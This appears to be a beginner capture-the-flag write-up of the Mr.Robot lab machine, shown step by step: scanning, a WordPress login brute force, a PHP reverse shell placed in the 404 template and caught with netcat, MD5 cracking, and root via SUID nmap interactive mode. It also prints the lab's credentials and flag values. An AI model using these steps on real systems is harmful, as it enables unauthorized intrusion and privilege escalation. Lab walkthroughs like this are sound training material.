In this writeup, I will cover an awesome machine from the VulnHub - Mr.Robot.
There is also a version of that machine on TryHackMe!
Description:
Based on the show, Mr. Robot.
This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.
The VM isn't too difficult. There isn't any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.
Information gathering
The machine itself distributed inside of VM container as a .ova file. You will see the login screen, but the author not mentioned credentials in a description. Let's look around and scan the network:
netdiscover -i eth0 -r 192.168.159.0/24
My Kali host has the IP 192.168.159.128 and Mr.Robot machine has 192.168.159.129.
Scanning open ports on Mr.Robot machine:
root@kali:~# nmap -sV 192.168.159.129
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
Opening the IP in a browser, yeah, it is stylized for Mr.Robot TV series website. Fancy, but useless.
Scanning this IP with Nikto:
root@kali:~# nikto -h 192.168.159.128
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site differently to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names.
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: ; rel=shortlink
+ /readme.html: This WordPress file reveals the installed version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A WordPress installation was found.
+ /wp-admin/wp-login.php: WordPress login found
+ /blog/wp-login.php: WordPress login found
+ /wp-login.php: WordPress login found
Checking the findings, I have discovered a few interesting pages as /readme.html, /license.txt, /wp-login.php
and /robots.txt
.
Let's start from the /robots.txt
:
User-agent: *
fsocity.dic
key-1-of-3.txt
Let's open this path in a browser or simple WGET
it from the terminal:
073403c8a58a1f80d943455fb30724b9
Hooray! We have found the easiest flag. Moving forward.
Let's have a look at the fsocity.dic
file. Looks like a wordlist:
root@kali:~# head fsocity.dic
true
false
wikia
from
the
now
Wikia
extensions
scss
window
This wordlist contains a lot of duplicates, we need to remove them to speed up the process of brute force attack.
cat fsocity.dic | sort -u | uniq > newfsocity.dic
Now the list contains only 11k words instead of 800k+, it will save a lot of time.
The page /wp-login.php looks like the right place applies this list.
According to the readme.html the system is running WordPress Version 4.3.9
Brute force
Burp suite
There are plenty of tools designed for brute force attacks, I will slightly cover a few of them as a bonus.
During my walkthrough, I used TurboIntruder for the Burp Suite. Incredibly fast way to get into the web application.
Just intercept the login command in Burp, double-click on the password and choose "Send to turbo intruder".
In this case, the value of the password will be automatically replaced by %s
symbol and the tool will do the rest.
POST /wp-login.php HTTP/1.1
Host: 192.168.159.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.159.129/wp-login.php?loggedout=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Cookie: s_fid=0F6464DBC5078D64-2082C0564C7815D5; s_nr=1571217063697; wp-settings-6=libraryContent%3Dbrowse; wp-settings-time-6=1571317217; s_cc=true; s_sq=%5B%5BB%5D%5D; wordpress_test_cookie=WP+Cookie+check
Connection: close
Upgrade-Insecure-Requests: 1
log=elliot&pwd=%s&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.159.129%2Fwp-admin%2F&testcookie=1
As the whole machine has a "Mr.Robot flavor", my first guess was to try "Elliot" as a username.
After a tuning, a turbo intruder a bit I had a password in my hand:
ER28-0652
WPScan
As it is this machine we are working with WordPress, it's a good idea to use some tools designed exactly for it.
WPScan is a free black box WordPress vulnerability scanner already preinstalled in Kali.
Firing it up and take a coffee break, it will take a while.
root@kali:~# wpscan --url 192.168.159.129 --wordlist ./newfsocity.dic --username elliot
---
[+] [SUCCESS] Login : elliot Password : ER28-0652
+----+--------+------+-----------+
| Id | Login | Name | Password |
+----+--------+------+-----------+
| | elliot | | ER28-0652 |
+----+--------+------+-----------+
We already have admin credentials, but let's also check possible vulnerability's here:
root@kali:~# wpscan -u 192.168.159.129 -e vp
We will have a huge list of possible Cross-Site Scripting, but nothing that will help us exploit the system even more.
Bonus
Let's have a look at the /license.txt:
What you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?
do you want a password or something?
ZWxsaW90OkVSMjgtMDY1Mgo=
Huh, interesting. Looks like a password encoded in base64:
root@kali:~# echo ZWxsaW90OkVSMjgtMDY1Mgo= | base64 --decode
elliot:ER28-0652
Perfect! You don't need to even brute force anything if the information gathering stage was done properly.
Using these credentials, we can log in to the admin panel at /wp-login
page.
Exploitation
From that point there are a lot of attack vectors, for example, you can craft a malicious plugin and install it, or get the data from the database,
We will follow the probably the easiest way - RCE
An example of PHP reverse shell can be found in PentestMonkey, for example.
From the admin panel in /wp-admin
page we can edit any template files, the first in the list is "404 Template", so we will use that.
Just put the code from PentestMonkey into the editor and tweak the IP and port to yours.
On your host open the terminal and set up a listener to catch the shell when it will be triggered:
root@kali:~# nc -lvp 1337
listening on [any] 1337 ...
Open a 404.php page in a browser or trigger it by curl from your terminal:
root@kali:~# curl
http://192.168.159.129/404.php
If the IP and port were set up properly, you will have a response in a terminal:
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$ whoami
daemon
$ hostname
linux
Hooray! You are in. Look around and open /home/robot folder:
root@kali:~# cd /home/robot
There are two files there, key-2-of-3.txt
and password.raw-md5
.
To be able to log in to the robot session we need to have a TTY shell.
python -c 'import pty; pty.spawn("/bin/sh")'
The second flag is very close, but you have a shell as a daemon user, who doesn't have access to this file.
Luckily, you have a hash of the password nearby, open any tool for decoding MD5, for example, MD5Online, and decode it:
Found : abcdefghijklmnopqrstuvwxyz
(hash = c3fcd3d76192e4007dfb496cca67e13b)
Going back to the terminal with the reverse shell in it:
$ su - robot
su - robot
Password: abcdefghijklmnopqrstuvwxyz
$ whoami
whoami
robot
Now we are logged in as a robot user and we can open key-2-of-3.txt
:
$ cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
The second key is
822c73956184f694993bede3eb39f959
Let's try to get the root! We will need to do a [privilege escalation] (https://en.wikipedia.org/wiki/Privilege_escalation) for that.
First of all, we will check for any files that have the SUID set files:
$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
Interesting, the nmap is installed. Checking for a version:
robot@linux:/$ /usr/local/bin/nmap --version
/usr/local/bin/nmap --version
nmap version 3.81 ( http://www.insecure.org/nmap/ )
The old version of nmap will allow you to use "interactive" mode. In this mode, you can execute the commands from nmap's shell.
The moment of truth:
$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# cd /root
cd /root
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
```
Well done, we have the last flag now:
04787ddef27c3dee1ee161b21670b4e4
Conclusion
It was a robust entry-level machine with a classic exploitation flow. Recommending it for beginners, there are at least a few good learning points if you are not very experienced yet.